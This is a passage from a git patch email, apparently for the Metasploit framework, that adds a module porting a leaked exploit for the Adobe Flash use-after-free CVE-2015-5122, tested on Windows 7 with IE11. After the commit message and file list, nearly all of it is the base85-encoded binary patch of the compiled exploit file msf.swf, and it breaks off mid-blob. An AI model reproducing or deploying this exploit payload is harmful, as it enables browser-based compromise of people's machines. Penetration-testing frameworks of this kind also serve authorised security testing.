Subject: [PATCH 0725/1013] Add module for flash CVE-2015-5122

* Just a fast port for the exploit leaked
* Just tested on win7sp1 / IE11
---
 data/exploits/CVE-2015-5122/msf.swf           | Bin 0 -> 43247 bytes
 external/source/exploits/CVE-2015-5122/Elf.as | 235 +++++++++
 .../source/exploits/CVE-2015-5122/Exploit.as  |  37 ++
 .../CVE-2015-5122/ExploitByteArray.as         |  85 +++
 .../exploits/CVE-2015-5122/ExploitVector.as   |  75 +++
 .../exploits/CVE-2015-5122/Exploiter.as       | 493 ++++++++++++++++++
 .../source/exploits/CVE-2015-5122/Logger.as   |  32 ++
 .../source/exploits/CVE-2015-5122/MyClass.as  | 142 +++++
 external/source/exploits/CVE-2015-5122/PE.as  |  72 +++
 .../adobe_flash_opaque_background_uaf.rb      | 137 +++++
 10 files changed, 1308 insertions(+)
 create mode 100755 data/exploits/CVE-2015-5122/msf.swf
 create mode 100755 external/source/exploits/CVE-2015-5122/Elf.as
 create mode 100755 external/source/exploits/CVE-2015-5122/Exploit.as
 create mode 100755 external/source/exploits/CVE-2015-5122/ExploitByteArray.as
 create mode 100755 external/source/exploits/CVE-2015-5122/ExploitVector.as
 create mode 100755 external/source/exploits/CVE-2015-5122/Exploiter.as
 create mode 100755 external/source/exploits/CVE-2015-5122/Logger.as
 create mode 100755 external/source/exploits/CVE-2015-5122/MyClass.as
 create mode 100755 external/source/exploits/CVE-2015-5122/PE.as
 create mode 100644 modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb

diff --git a/data/exploits/CVE-2015-5122/msf.swf b/data/exploits/CVE-2015-5122/msf.swf
new file mode 100755
index 0000000000000000000000000000000000000000..ae20d7f534af3eb3c4c3a40e6314885e5c092202
GIT binary patch
literal 43247
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
